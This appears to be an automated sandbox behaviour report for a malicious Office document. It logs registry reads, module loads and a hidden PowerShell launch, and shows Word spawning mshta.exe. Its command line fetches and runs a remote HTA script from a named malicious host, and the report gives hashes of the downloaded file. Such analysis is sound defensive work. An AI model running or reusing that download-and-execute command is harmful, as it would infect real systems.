| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | value_name = Print_Background |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe | show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\System32\mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x7fefc060000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | mshtml.dll | base_address = 0x7fee0880000 |
|
1 | |
| Load | OLEACC.DLL | base_address = 0x7fef22f0000 |
|
1 | |
| Load | ieframe.dll | base_address = 0x7fef2350000 |
|
2 | |
| Load | ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x7fefe850000 |
|
1 | |
| Load | oleaut32.dll | base_address = 0x7fefde70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x7feff5e0000 |
|
1 | |
| Get Handle | c:\windows\system32\mshta.exe | base_address = 0xff9d0000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x776e0000 |
|
3 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x7feff8e0000 |
|
1 | |
| Get Handle | EXPLORER.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | IEXPLORE.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\system32\ole32.dll | base_address = 0x7fefe1c0000 |
|
1 | |
| Get Handle | mscoree.dll | base_address = 0x0 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
4 | |
| Get Filename | C:\Windows\System32\mshtml.dll | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\system32\mshta.exe | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Get Filename | IEXPLORE.EXE | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventWrite, address_out = 0x7782b510 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventRegister, address_out = 0x7783cac0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Get Address | c:\windows\system32\mshtml.dll | function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77828050 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockShared, address_out = 0x778254b0 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 6, address_out = 0x7fefde71320 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 7, address_out = 0x7fefde71020 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 8, address_out = 0x7fefde713f0 |
|
1 | |
| Get Address | c:\windows\system32\oleacc.dll | function = LresultFromObject, address_out = 0x7fef22f3aa8 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7fefe1e7490 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 2, address_out = 0x7fefde73480 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x7fefe1da4c4 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetClassObject, address_out = 0x7fefe1f2e18 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteExW, address_out = 0x7fefe877c70 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = VariantClear, address_out = 0x7fefde71180 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetUnlockRequestFile, address_out = 0x7feff5f70f4 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Map | - | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 3921792 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
2 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID |
|
2 | |
| Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
19 | |
| Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
19 | |
| Read | virtual_key_code = VK_MENU, result_out = 0 |
|
19 | |
| Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
8 | |
| Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
9 | |
| Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
9 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 724, y_out = 422 |
|
5 | |
| Get Cursor | x_out = 791, y_out = 286 |
|
5 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
3 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Sleep | duration = -1 (infinite) |
|
3 | |
| Get Time | type = System Time, time = 2017-10-24 17:37:59 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 127203 |
|
1 | |
| Get Time | type = Ticks, time = 127546 |
|
1 | |
| Get Time | type = Ticks, time = 131134 |
|
1 | |
| Get Time | type = Ticks, time = 131181 |
|
251 | |
| Get Time | type = Ticks, time = 131196 |
|
4 | |
| Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 131243 |
|
1 | |
| Get Time | type = Ticks, time = 131274 |
|
1 | |
| Get Time | type = Ticks, time = 131493 |
|
1 | |
| Get Time | type = Ticks, time = 151367 |
|
1 | |
| Get Info | type = Operating System |
|
7 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | - |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:02, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:34 |
| Information | Value |
|---|---|
| PID | 0xbc8 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BCC
0x
BDC
0x
BEC
0x
BF0
0x
BF4
0x
BF8
0x
80C
0x
81C
0x
83C
0x
864
0x
7B0
0x
518
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\t[1].hta | 3.24 KB (3313 bytes) |
MD5:
13b131d98fea2526196b20496ec68b0a
SHA1: 1284d7400f30f5a2c409f3f53fcf34b30c32268d SHA256: ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75 |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3050F5C8-98B5-11CF-BB82-00AA00BDCE0B | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 50D5107A-D278-4871-8989-F4CEAAF59CFC | 08C0E040-62D1-11D1-9326-0060B067B86E | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | BB1A2AE1-A4F9-11CF-8F20-00805F2CD064 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | WsCriPt.SHeLl | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open Mapping | #MSHTML#PERF#00000BC8 | desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
